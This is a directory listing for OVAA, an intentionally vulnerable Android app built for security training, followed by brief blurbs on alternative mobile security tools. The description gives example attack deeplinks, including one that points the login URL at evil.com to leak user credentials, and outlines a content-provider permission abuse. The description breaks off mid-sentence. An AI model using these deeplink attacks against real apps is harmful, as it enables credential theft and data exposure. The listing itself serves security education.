OVAA (Oversecured Vulnerable Android App) Logo

OVAA (Oversecured Vulnerable Android App)

0
Free
Visit Website

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(

FEATURES

ALTERNATIVES

A security testing framework for Android with tools to search for vulnerabilities and interact with the Android Runtime.

A tool for analyzing Android applications in local storage with various functionalities.

Python tool for monitoring user-select APIs in Android apps using Frida.

Web-based tool for browsing mobile applications sandbox and previewing SQLite databases.

Tools and documentation for validating hardware security requirements on x86 platforms, including bootable USB key creation and platform configuration verification.

AMDH is an Android tool for automating scanning, hardening system settings, detecting malware, and protecting privacy.

Android vulnerability analysis system with efficient scanning and high accuracy.

A Low-cost ICS Security Testbed for Education and Research